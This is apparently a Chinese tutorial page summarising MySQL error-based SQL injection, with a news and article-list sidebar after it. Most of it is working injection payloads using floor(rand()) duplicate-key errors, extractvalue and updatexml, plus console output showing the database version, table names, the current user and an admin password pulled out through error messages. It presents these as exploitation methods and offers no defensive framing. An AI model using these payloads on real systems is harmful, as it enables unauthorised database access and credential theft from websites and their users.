这篇文章主要介绍了mysql 注入报错利用方法总结的相关资料,需要的朋友可以参考下

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

举例如下:

首先进行正常查询:

mysql> select * from article where id = 1;

+—-+——-+———+

| id | title | content |

+—-+——-+———+

| 1 | test | do it |

+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

ERROR 1062 (23000): Duplicate entry ‘5.1.33-community-log1’ for key ‘group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。

例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);

ERROR 1062 (23000): Duplicate entry ‘admin8881’ for key ‘group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));

ERROR 1062 (23000): Duplicate entry ‘admin8881’ for key ‘group_key’

2、ExtractValue

测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–

ERROR 1105 (HY000): XPATH syntax error: ‘\admin888’

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ‘:[email protected]

最新资讯
台积电宣布将建全球首家2nm工厂 最快2024年投产

台积电宣布将建全球首

台积电正式宣布启动2nm工艺的研发,这使其成为第一家宣
8月快递经营数据:顺丰营收破90亿 圆通单票收入最低

8月快递经营数据:顺丰

顺丰控股、圆通速递、申通快递、韵达快递(下称顺丰、圆
"一键换脸"之后是"剪刀手" 网络安全召唤AI反制高手

"一键换脸"之后是"

“V字”手势或“剪刀手”诞生以来风靡全球,已成为人们
失速的共享办公:WeWork上市遇阻 戳破行业盈利泡沫

失速的共享办公:WeWork

“从现在开始,大家要勒紧裤腰带过日子了。”
华为放大招 布局计算黄金十年

华为放大招 布局计算

仍处在“实体清单”中的华为首次提出计算战略。自救需
苹果:新iPhone核心部件将使用回收稀土

苹果:新iPhone核心部件

苹果公司今日表示,新一代iPhone的核心零部件Taptic Eng
最新文章
IIS 短文件/文件夹漏洞修复方法

IIS 短文件/文件夹漏

IIS短文件名泄露漏洞,IIS上实现上存在文件枚举漏洞,攻击
局域网共享安全方式之用局域网文件共享系统实现共享文件夹安全设置

局域网共享安全方式之

现在很多单位都有文件服务器,经常会共享文件让局域网用
防范黑客入侵,关闭端口封锁大门 黑客无法入侵

防范黑客入侵,关闭端口

这篇文章主要介绍了防范黑客入侵,关闭端口封锁大门 黑
电脑遭受ARP攻击,解决办法

电脑遭受ARP攻击,解决

这篇文章主要介绍了电脑遭受ARP攻击,解决办法的相关资
如何保证自己的上网安全?防范自救就靠10条

如何保证自己的上网安

虽然现在网络很发达,但对我们普通人而言,也就是10多年的
现代网络性能监控工具应具备何种技能?网络与应用程序监控

现代网络性能监控工具

大家都知道现在市场上的网络性能监控工具大有所在,这为